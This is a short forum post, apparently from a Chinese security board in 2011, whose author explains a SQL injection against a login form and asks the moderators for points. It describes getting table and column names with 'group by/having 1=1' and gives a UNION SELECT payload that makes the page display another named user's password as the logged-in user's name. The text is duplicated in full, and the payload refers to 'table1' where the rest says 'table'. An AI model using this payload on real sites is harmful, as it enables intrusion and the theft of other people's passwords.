-
-
[旧帖] [原创]想到一个注入语句 0.00雪花
-
发表于: 2011-7-10 10:46
-
假如登录需要输入帐号
而你有一个帐号ABC
通常网站会发出这么一个查询语句:select * from table where loginname='ABC'
数据库服务器通常会返回类似下面的查询结果
id loginname name password
99 ABC Myname Mypassword
然后网站通过比较用户输入的密码与所获取的密码比较,如果正确就让用户登录
注入时先使用group by语句及having 1=1配合可以获得表名table 及列名id,loginname,name,password
然后构造这么一个注入语句
ABCxxxx' union select id,loginname,name=(select password from table1 where name='someone'),password from table where loginname='ABC'-- 填入登录界面的输入框中,并输入你的密码
其中someone是某人的名字,ABCxxxx是为了使union 前半部分没有返回结果,因为我需要的只是union后面的sql语句的结果
之后登录,如果幸运的话登录后的用户界面中的名字就变成用户someone的密码了
因为数据库服务器可能会返回下面的查询结果
id loginname name password
99 ABC someone的密码 Mypassword
版主可不可以给些分
而你有一个帐号ABC
通常网站会发出这么一个查询语句:select * from table where loginname='ABC'
数据库服务器通常会返回类似下面的查询结果
id loginname name password
99 ABC Myname Mypassword
然后网站通过比较用户输入的密码与所获取的密码比较,如果正确就让用户登录
注入时先使用group by语句及having 1=1配合可以获得表名table 及列名id,loginname,name,password
然后构造这么一个注入语句
ABCxxxx' union select id,loginname,name=(select password from table1 where name='someone'),password from table where loginname='ABC'-- 填入登录界面的输入框中,并输入你的密码
其中someone是某人的名字,ABCxxxx是为了使union 前半部分没有返回结果,因为我需要的只是union后面的sql语句的结果
之后登录,如果幸运的话登录后的用户界面中的名字就变成用户someone的密码了
因为数据库服务器可能会返回下面的查询结果
id loginname name password
99 ABC someone的密码 Mypassword
版主可不可以给些分
